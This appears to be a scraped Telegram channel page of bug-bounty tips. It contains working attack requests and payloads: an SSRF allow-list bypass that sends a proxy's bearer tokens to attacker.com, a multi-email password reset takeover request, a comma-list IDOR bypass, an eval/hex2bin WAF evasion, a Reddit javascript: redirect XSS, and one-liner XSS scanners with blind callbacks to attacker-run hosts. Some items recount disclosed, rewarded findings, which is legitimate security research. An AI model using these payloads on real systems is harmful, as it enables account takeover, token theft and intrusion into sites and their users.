Brut Security
14.8K subscribers
941 photos
74 videos
289 files
987 links
โœ…Queries: @wtf_brut
๐Ÿ›ƒWhatsApp: wa.link/brutsecurity
๐ŸˆดTraining: brutsec.com
๐Ÿ“จE-mail: [email protected]
Download Telegram
Hey Hunters,

DarkShadow hereโ€”back again with a very interesting Google SSRF Proof of Concept!


๐Ÿง  Fixing the Unfixable: A Google Cloud SSRF Tale

A critical Server-Side Request Forgery (SSRF) vulnerability was discovered in Google's cxl-services.appspot.com proxy, which powers interactive demos for various Google Cloud products, including jobs.googleapis.com.


๐Ÿ” Discovery

While exploring the Cloud Talent Solution API (jobs.googleapis.com), it was noticed that demo requests were routed through:

cxl-services.appspot.com/proxy?url=

Hereโ€™s a sample request:

GET /proxy?url=https://jobs.googleapis.com/v4/projects/4808913407/tenants/ff8c4578-8000-0000-0000-00011ea231ff/jobs:search HTTP/1.1
Host: cxl-services.appspot.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Content-Type: application/json; charset=utf-8
Content-Length: 102
Connection: close

{"jobQuery":{"query":"bartendar","queryLanguageCode":"en"},"jobView":"JOB_VIEW_SMALL","maxPageSize":5}


The response returned 200 OK and displayed the full content, meaning the SSRF was not blind โ€” and that makes it critical.


๐Ÿงฑ Initial Test: Traditional SSRF Blocked

Trying to change the url parameter to a malicious domain:

GET /proxy?url=https://attacker_server.com HTTP/1.1
Host: cxl-services.appspot.com

Response:

403 Forbidden
Invalid Target Host - Please add to allow list


This indicated the presence of a backend whitelist restricting outbound requests.


๐Ÿ›ก๏ธ Whitelist Bypass Trick

Despite the whitelist, a clever bypass was possible by exploiting discrepancies between URL parsers (RFC3986 vs. WHATWG) using a backslash (\) and @ symbol:

GET /proxy?url=https://attacker.com\@jobs.googleapis.com/ HTTP/1.1
Host: cxl-services.appspot.com


This tricked the proxy into making the request to attacker.com, while treating the domain as jobs.googleapis.com.


๐Ÿ”“ Sensitive Token Leakage

Even worse: the proxy included an Authorization: Bearer <token> header in its outbound requests.

By redirecting traffic to a controlled server, the researcher was able to capture tokens granting access to internal Google Cloud projects such as:

docai-demo
cxl-services
garage-staging
p-jobs


He even deployed a custom App Engine service within cxl-services, proving full code execution capabilities.


๐Ÿ’ฐ Bounty Rewards

For these critical findings, the researcher earned over $13,000 from Googleโ€™s Vulnerability Reward Program (VRP).

Credit: Discovered by David Schรผtz
But Hunters, donโ€™t forget to follow me for more deep-dive writeups and live exploitation breakdowns!

Follow me in X ๐Ÿ‘‰๐Ÿผ
DarkShadow

#bugbountytips #googlebug #ssrf
๐Ÿ”ฅ15๐Ÿ‘8๐Ÿ—ฟ2โค1๐Ÿ˜ฑ1
1๐Ÿ”ฅ14๐Ÿ˜ฑ4๐Ÿ—ฟ1
Good morning hacker's โค๏ธ
๐Ÿคฃ42โค6
Guys, I just bypassed a seriously tough WAF + IDS combo!

Let me give you a quick summary of the bypass journey:

While testing a WordPress setup, I noticed that it blocks any attempt to save PHP code using the standard <?php ?> tags โ€” access denied right away.
So, I tried using the shorthand <?= ?>, and surprisinglyโ€ฆ it got through!

However, the IDS was still smart enough to detect and block any dangerous functions โ€” even if they were Base64 encoded.

I experimented with multiple obfuscation methods, but none of them workedโ€ฆ until I had a breakthrough!

๐Ÿ‘€The trick? I used hex2bin() in combination with eval() โ€” and that finally bypassed both the WAF and IDS.๐Ÿ’ฅ

Want the payload/code? Let me know โ€”
And don't forget to follow me ๐Ÿ‘‰๐Ÿผ
DarkShadow

#wafbypass
๐Ÿซก35๐Ÿ”ฅ8๐Ÿ‘7โค4
๐Ÿ“ฃ Free 15-Day ZoomEye Membership for Brut Security Members!

๐ŸŽ‰ ZoomEye โ€” one of the most widely used cyberspace search engines for security researchers โ€” is offering a 15-day free trial of their Personal Membership exclusively to the Brut Security community.

Perfect for anyone involved in:
โญ๏ธ Bug bounty & recon
โญ๏ธ Red teaming & OSINT
โญ๏ธ Cybersecurity research & learning

โ‰๏ธ How to claim your free trial:
โžก๏ธ Follow ZoomEye on X: https://x.com/zoomeye_team
โžก๏ธ Send them a DM with the message:
โœ๏ธ Brut Security
โžก๏ธ Theyโ€™ll activate your 15-day trial access โ€” no payment required.

Take advantage of this opportunity and explore ZoomEyeโ€™s premium features!

#BrutSecurity #ZoomEye
Please open Telegram to view this post
VIEW IN TELEGRAM
2โค14๐Ÿ”ฅ4๐Ÿ‘3
Hey, donโ€™t forget to like and share! And if you give it a try, tell us โ€” weโ€™d love to know how youโ€™re using it!
โค12๐Ÿ‘7
๐Ÿ’ก IDOR Bypass Bug Bounty Tip

Sometimes APIs behave unexpectedly when multiple IDs are passed together.

๐Ÿ” Scenario
โ€ข Victimโ€™s ID: 5200
โ€ข Attackerโ€™s ID: 5233

๐Ÿšซ GET /api/users/5200/info โ†’ Access Denied
โœ… GET /api/users/5200,5233/info โ†’ Bypass Successful

๐Ÿ“Œ Always test for comma-separated, array-style, or batch ID parameters when hunting for IDOR!

#bugbountytips #bugbounty #infosec #cybersecurity #api #IDOR #pentesting #bugbountyTips
๐Ÿ”ฅ28๐Ÿ‘12โค10๐Ÿ‘2
๐Ÿšจ CVE-2025-2563 ๐Ÿšจ- A Metasploit module to exploit an unauthenticated privilege escalation in the WordPress User Registration & Membership plugin (Free < 4.1.2, Pro < 5.1.2) [+70k installs].

โ–ถ๏ธ https://github.com/rapid7/metasploit-framework/pull/20159
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘11โค5๐Ÿ”ฅ1
โœ…RBAC Checklist
๐Ÿ‘14โค3
Brut Security
Password Reset Bypass Trick ๐ŸŒ€ Some poorly secured endpoints accept multiple email parameters.๐Ÿ˜ณ Try this: POST /passwordReset HTTP/1.1 Content-Type: application/x-www-form-urlencoded [email protected]&[email protected] Or in JSON: {โ€ฆ
Hey Hunters,
DarkShadow is back again with another POC that earned $35,000 ๐Ÿ™Œ๐Ÿผ

๐Ÿ’ฅ GitLab Password Reset via Account Takeover Vulnerability ๐Ÿ˜ฌ

This vulnerability was recently patched. It exploited the password reset functionality by abusing the JSON request sent from the client side. The request allowed multiple email addresses to be specified without properly verifying them, resulting in the password reset link being sent to both the victim's email and the attacker's email ๐Ÿคฏ

โœ… POC Request:

"user": {
    "email": [
        "[email protected]",
        "[email protected]"
    ]
}


I was shared this same method a long time ago ๐Ÿ˜
Don't forget to follow me ๐Ÿ‘‰๐Ÿผ
DarkShadow
๐Ÿ—ฟ16๐Ÿ”ฅ11โค6๐Ÿ‘6๐Ÿ˜ฑ3
๐Ÿคฃ30๐Ÿ‘2๐Ÿ˜1
Hey Hunters,
DarkShadow hereโ€”back again with a quick drop!

If you're using
revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shellโ€”no more manual payload hunting!

Let me know if you need๐Ÿ‘€
๐Ÿ”ฅ19๐Ÿ‘7๐Ÿณ2
๐Ÿ‘Brut Security just hit 12K+ members!

โญ๏ธHuge thanks to everyone supporting the community.
More tools, tips, and hacking content coming your way!

Stay connected with us โ€” the journey has just begun.
Donโ€™t forget to like and share! ๐Ÿ™Œ
Please open Telegram to view this post
VIEW IN TELEGRAM
2๐Ÿ‘25โค11๐Ÿ”ฅ4
Hey Hunter's,
DarkShadow here back again, dropping some one-liner killer XSS commands๐Ÿ˜‰

Cleaned XSS Payload Hunting Commands:


1. Wayback + httpx + GF + Dalfox

cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done

2. Gospider + Dalfox

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe
3. Wayback + GF + Blind XSS via Dalfox

waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe


4. Gospider + Dalfox (Deep Crawl)

gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt
5. Dalfox Direct with Blind XSS

cat urls.txt | dalfox pipe -b yourdomain.xss



Required tools are:

httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox

If you find this helpful and want more cutting-edge tips and tricks, donโ€™t forget to follow me ๐Ÿ‘‰๐Ÿผ DarkShadow

#bugbountytips #xss
๐Ÿ”ฅ13๐Ÿ‘7๐Ÿ‘5๐Ÿ‘จโ€๐Ÿ’ป3
Which browser you use?
๐Ÿคฃ38๐Ÿ—ฟ9โค4๐Ÿ˜1
Good morning hacker's,
Let's start morning to hack Reddit account ๐Ÿ˜‰
๐Ÿ˜11๐Ÿซก2
Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!

Letโ€™s break it down and understand the logic behind the vulnerability.


Vulnerable Parameter: ?dest=

What does the dest parameter do?

The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:

A user tries to access a protected page.

Reddit redirects them to:
/login/?dest=/protected/resource

After login, the site redirects them to the original dest URL.

Sounds fine, right? But hereโ€™s the twist...


โœ… PoC Steps (Super Simple):

https://www.reddit.com/login/?dest=javascript:alert(document.domain)


Boom๐Ÿ’ฅ. Thatโ€™s it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation โ€” just a mindset shift.


keep your payloads sharp and your eyes sharper.
Donโ€™t forget to react, share, and
follow me in X
๐Ÿ‘‰๐Ÿผ
DarkShadow

#bugbountytips #xss
๐Ÿ‘18๐Ÿ‘10๐Ÿ”ฅ7๐Ÿ—ฟ4โค2